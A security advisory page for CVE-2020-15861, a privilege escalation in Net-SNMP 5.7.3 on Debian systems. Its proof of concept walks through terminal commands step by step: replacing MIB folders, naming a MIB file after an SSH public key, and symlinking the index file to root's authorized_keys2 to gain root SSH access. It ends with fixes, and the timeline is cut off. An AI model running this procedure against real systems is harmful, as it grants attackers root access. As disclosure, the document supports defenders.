{"id":16711,"date":"2021-07-08T08:19:33","date_gmt":"2021-07-08T06:19:33","guid":{"rendered":"https:\/\/herolab-usd.formwandler.rocks\/security-advisories\/usd-2020-0060\/"},"modified":"2021-07-19T14:17:25","modified_gmt":"2021-07-19T12:17:25","slug":"usd-2020-0060","status":"publish","type":"page","link":"https:\/\/herolab.usd.de\/en\/security-advisories\/usd-2020-0060\/","title":{"rendered":"usd-2020-0060"},"content":{"rendered":"

[et_pb_section fb_built=\"1\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\"]<\/p>\n

usd-2020-0060 | Net-SNMP v5.7.3<\/span><\/h1>\n

<\/span><\/p>\n

<\/span>Advisory ID<\/strong>: usd-2020-0060<\/span>
CVE Number<\/strong>: CVE-2020-15861<\/span>
Affected Product<\/strong>: Net-SNMP<\/span>
Affected Version<\/strong>: 5.7.3<\/span>
Vulnerability Type<\/strong>: Elevation of Privileges<\/span>
Security Risk<\/strong>: High<\/span>
Vendor URL<\/strong>: http:\/\/www.net-snmp.org\/<\/a><\/span>
Vendor Status<\/strong>: Fixed<\/span><\/p>\n

<\/h3>\n

Description<\/h3>\n

On Debian based systems, the NET-SNMP daemon runs as a low privileged user account. However, in combination with the snmp-mibs-downloader package<\/code> this protection can be bypassed and it is possible for this account to elevate permissions to the root user.<\/p>\n

The Simple Network Management Protocol (SNMP)<\/strong> is a widely used network protocol for controlling and monitoring network devices. Since the corresponding service (SNMP daemon) needs access to a lot of system components and (per default) binds the network port 161, it usually runs as the root user. On Debian based systems, the default installation of SNMP sets up a dedicated low privileged user account (Debian-snmp), that is used to run the SNMP daemon. This adds an additional layer of security, as a compromise of the SNMP service does not directly allow root access to the targeted device.<\/p>\n

<\/h3>\n

Proof of Concept (PoC)<\/h3>\n

After installing the SNMP daemon on a Debian based system (e.g. <\/span>apt install snmpd<\/code>), a new user account is created by the installer:<\/span><\/p>\n

[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"9e260d37-0be2-4a12-a10e-3ed7e27b6ac6\" hover_enabled=\"0\" sticky_enabled=\"0\"]root:x:0:0:root:\/root:\/bin\/bash
\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin
\n[..SNIP..]
\nDebian-snmp:x:122:127::\/var\/lib\/snmp:\/bin\/false<\/code>[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\"]\"The Debian-snmp user has configured its home directory inside
\n\/var\/lib\/snmp<\/code>
\nwhich contains the following contents per default:<\/p>\n

The Debian-snmp user has configured its home directory inside<\/p>\n

\/var\/lib\/snmp<\/pre>\n
which contains the following contents per default:[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"9e260d37-0be2-4a12-a10e-3ed7e27b6ac6\" hover_enabled=\"0\" sticky_enabled=\"0\"]ubuntu@ubuntu:\/var\/lib\/snmp$ ls -la<\/p>\n
total 4<\/p>\n
drwxr-xr-x 1 Debian-snmp Debian-snmp 100 Jul 7 04:57 .<\/p>\n
drwxr-xr-x 1 root root 500 Jul 7 04:26 ..<\/p>\n
drwx------ 2 root root 100 Jul 7 04:46 mib_indexes<\/p>\n
-rw------- 1 Debian-snmp Debian-snmp 1097 Jul 7 04:57 snmpd.conf[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\" custom_margin=\"||27px||false|false\"]<\/p>\n
After installing the <\/span>snmp-mibs-downloader<\/code> package, another folder is created inside this directory:<\/span><\/p>\n
[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"9e260d37-0be2-4a12-a10e-3ed7e27b6ac6\" hover_enabled=\"0\" sticky_enabled=\"0\"]total 4
\ndrwxr-xr-x 1 Debian-snmp Debian-snmp  100 Jul  7 04:57 .
\ndrwxr-xr-x 1 root        root         500 Jul  7 04:26 ..
\ndrwx------ 2 root        root         100 Jul  7 04:46 mib_indexes
\ndrwxr-xr-x 4 root        root          80 Jul  7 04:43 mibs
\n-rw------- 1 Debian-snmp Debian-snmp 1097 Jul  7 04:57 snmpd.conf<\/code>[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"default\"]<\/p>\n
The <\/span>mib_indexes<\/code> folder contains different files that store lists of all available MIBs on the server. The following snipped shows that some of these MIBs are loaded from a path that is located inside the home directory of the Debian-snmp user:<\/span><\/p>\n
[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"9e260d37-0be2-4a12-a10e-3ed7e27b6ac6\" hover_enabled=\"0\" sticky_enabled=\"0\"]root@ubuntu:\/var\/lib\/snmp\/mib_indexes# ls
\n0  1  2
\nroot@ubuntu:\/var\/lib\/snmp\/mib_indexes# cat 1
\nDIR \/usr\/share\/snmp\/mibs\/iana
\nIANAifType-MIB IANAifType-MIB
\n[..SNIP..]
\nroot@ubuntu:\/var\/lib\/snmp\/mib_indexes# ls -l \/usr\/share\/snmp\/mibs\/iana
\nlrwxrwxrwx 1 root root 23 Sep  1  2016 \/usr\/share\/snmp\/mibs\/iana -> \/var\/lib\/snmp\/mibs\/iana<\/code>[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"default\"]<\/p>\n
The index files always contain the first word of the MIB configuration file, followed by the filename of the MIB configuration file. This allows the Debian-snmp user to partially control the contents of the index files. Furthermore, the index files are rewritten on each startup of snmpd as the root user account. This allows to perform a symlink attack as the Debian-snmp user.<\/p>\n
To perform the attack the Debian-snmp user first moves the mib_indexes<\/code> and mibs<\/code> folder inside of its home directory.
Afterwards the folders are recreated.<\/p>\n
[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"9e260d37-0be2-4a12-a10e-3ed7e27b6ac6\" hover_enabled=\"0\" sticky_enabled=\"0\"]Debian-snmp@ubuntu:\/var\/lib\/snmp$ id
\nuid=122(Debian-snmp) gid=127(Debian-snmp) groups=127(Debian-snmp)
\nDebian-snmp@ubuntu:\/var\/lib\/snmp$ mv mib_indexes moved
\nDebian-snmp@ubuntu:\/var\/lib\/snmp$ mkdir mib_indexes
\nDebian-snmp@ubuntu:\/var\/lib\/snmp$ mv mibs moved2
\nDebian-snmp@ubuntu:\/var\/lib\/snmp$ mkdir mibs
\nDebian-snmp@ubuntu:\/var\/lib\/snmp$ ls -l
\ntotal 4
\ndrwxr-xr-x 2 Debian-snmp Debian-snmp   40 Jul  7 05:00 mib_indexes
\ndrwxr-xr-x 2 Debian-snmp Debian-snmp   40 Jul  7 05:02 mibs
\ndrwx------ 2 root        root         100 Jul  7 04:46 moved
\ndrwxr-xr-x 4 root        root          80 Jul  7 04:43 moved2
\n-rw------- 1 Debian-snmp Debian-snmp 1097 Jul  7 04:57 snmpd.conf<\/code>[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"default\"]<\/p>\n
Now the folders <\/span>mib_indexes<\/code> and <\/span>mibs<\/code> are owned by Debian-snmp and it is possible to create arbitrary contents inside of them. The following snipped shows how a malicious MIB configuration file is generated and placed inside <\/span>\/var\/lib\/snmp\/mibs\/iana\/<\/code>:<\/span><\/p>\n
[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"9e260d37-0be2-4a12-a10e-3ed7e27b6ac6\" hover_enabled=\"0\" sticky_enabled=\"0\"]Debian-snmp@ubuntu:\/var\/lib\/snmp$ cd mibs
\nDebian-snmp@ubuntu:\/var\/lib\/snmp\/mibs$ mkdir iana
\nDebian-snmp@ubuntu:\/var\/lib\/snmp\/mibs$ cd iana\/
\nDebian-snmp@ubuntu:\/var\/lib\/snmp\/mibs\/iana$ cp \/usr\/share\/snmp\/mibs\/LM-SENSORS-MIB.txt 'AAAAC3NzaC1lZDI1NTE5AAAAIEW0peoVA+OHrUlYEVQHYc1Rn1bNlEKhbx6xgnpBDnaa -MIB'
\nDebian-snmp@ubuntu:\/var\/lib\/snmp\/mibs\/iana$ vim AAAAC3NzaC1lZDI1NTE5AAAAIEW0peoVA+OHrUlYEVQHYc1Rn1bNlEKhbx6xgnpBDnaa\\ -MIB
\nDebian-snmp@ubuntu:\/var\/lib\/snmp\/mibs\/iana$ head -n 1 AAAAC3NzaC1lZDI1NTE5AAAAIEW0peoVA+OHrUlYEVQHYc1Rn1bNlEKhbx6xgnpBDnaa\\ -MIB
\nssh-ed25519 DEFINITIONS ::= BEGIN
\nDebian-snmp@ubuntu:\/var\/lib\/snmp\/mibs\/iana$ ls
\n'AAAAC3NzaC1lZDI1NTE5AAAAIEW0peoVA+OHrUlYEVQHYc1Rn1bNlEKhbx6xgnpBDnaa -MIB'<\/code>[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"default\"]<\/p>\n
The filename of the MIB configuration file was chosen to match a SSH public key. The first word inside the configuration file contains the key-algorithm. The key-algorithm followed by the SSH public key will be written to an index file once the snmpd daemon is restarted. The Debian-snmp user can now setup a symlink to write the index file to an arbitrary location of the file system.<\/span><\/p>\n
[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"9e260d37-0be2-4a12-a10e-3ed7e27b6ac6\" hover_enabled=\"0\" sticky_enabled=\"0\"]Debian-snmp@ubuntu:\/var\/lib\/snmp\/mibs\/iana$ cd \/var\/lib\/snmp\/mib_indexes\/
\nDebian-snmp@ubuntu:\/var\/lib\/snmp\/mib_indexes$ ln -s \/root\/.ssh\/authorized_keys2 1
\nDebian-snmp@ubuntu:\/var\/lib\/snmp\/mib_indexes$ ls -l
\ntotal 0
\nlrwxrwxrwx 1 Debian-snmp Debian-snmp 27 Jul  7 05:16 1 -> \/root\/.ssh\/authorized_keys2<\/code>[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"default\"]<\/p>\n
After the snmpd daemon is restarted, the index files get rewritten:<\/span><\/p>\n
[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"9e260d37-0be2-4a12-a10e-3ed7e27b6ac6\" hover_enabled=\"0\" sticky_enabled=\"0\"]Debian-snmp@ubuntu:\/var\/lib\/snmp\/mib_indexes$ ls -l
\ntotal 4
\n-rw-r--r-- 1 root        root        1013 Jul  7 05:17 0
\nlrwxrwxrwx 1 Debian-snmp Debian-snmp   27 Jul  7 05:16 1 -> \/root\/.ssh\/authorized_keys2<\/code>[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"default\"]<\/p>\n
Using the root account it can be confirmed, that the <\/span>authorized_keys2<\/code> file was written with the contents controlled by the Debian-snmp user:<\/span><\/p>\n
[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"9e260d37-0be2-4a12-a10e-3ed7e27b6ac6\" hover_enabled=\"0\" sticky_enabled=\"0\"]root@ubuntu:~# ls -l \/root\/.ssh\/
\ntotal 4
\n-rw-r--r-- 1 root root   0 Jul  7 05:17 authorized_keys
\n-rw-r--r-- 1 root root 116 Jul  7 05:18 authorized_keys2
\nroot@ubuntu:~# cat \/root\/.ssh\/authorized_keys2
\nDIR \/usr\/share\/snmp\/mibs\/iana
\nssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEW0peoVA+OHrUlYEVQHYc1Rn1bNlEKhbx6xgnpBDnaa -MIB<\/code>[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"default\"]<\/p>\n
Now the Debian-snmp user can use ssh to get access as the root account.<\/p>\n
Notice that in the demonstration above an interactive command prompt was used. However, all commands could also be executed remotely by using the NET-SNMP-EXTEND-MIB<\/code> extension and an account that has read-write<\/strong> access to the SNMP server.<\/p>\n
[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\"]<\/p>\n
\n
\n
Fix<\/h3>\n
There are different possibilities to fix this issue.<\/p>\n
    \n
  1. Don\u2019t allow the Debian-snmp user to control the contents of the mibs<\/code> and mib_indexes<\/code> folders inside \/var\/lib\/snmp<\/code>.<\/li>\n
  2. Don\u2019t write the mib_index<\/code> files as the root user, but use the Debian-snmp account instead.<\/li>\n
  3. Don\u2019t follow symlinks on mib_index<\/code> creation.<\/li>\n<\/ol>\n
    <\/h3>\n
    Timeline<\/h3>\n